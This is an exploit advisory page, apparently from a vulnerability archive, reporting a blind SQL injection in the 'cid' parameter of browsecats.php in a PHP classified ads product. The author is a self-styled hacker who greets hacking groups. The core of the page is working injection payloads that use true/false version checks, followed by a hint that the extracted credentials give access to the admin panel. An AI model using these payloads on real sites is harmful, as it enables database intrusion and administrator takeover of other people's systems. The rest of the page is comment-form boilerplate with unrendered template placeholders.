PHP Classified Ads Software Blind SQL Injection

2011.02.01

Credit: BorN To K!LL - h4ck3r

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-89

==
[-]Author: BorN To K!LL - h4ck3r
[-]Contact: SQL@hotmail.co.uk
==
[-]Script: PHP Classified ads software
[-]Version: n/a
[-]Link: http://www.softbizsolutions.com/classified-ads-software.php
==
[-]3xploit:
[path]/browsecats.php?cid=[Blind-Injection]
[-]3xample:
[path]/browsecats.php?cid=2 and substring(version(),1,1)=4 // false ,,
[path]/browsecats.php?cid=2 and substring(version(),1,1)=5 // true ,,
[-]Note:
after getting the username and the password you can login to admin panel
[path]/admin
==
[-]Greetings:
darkc0de team, AsbMay's group, w4ck1ng team , and "Kuwaitis"

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

PHP Classified Ads Software Blind SQL Injection

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.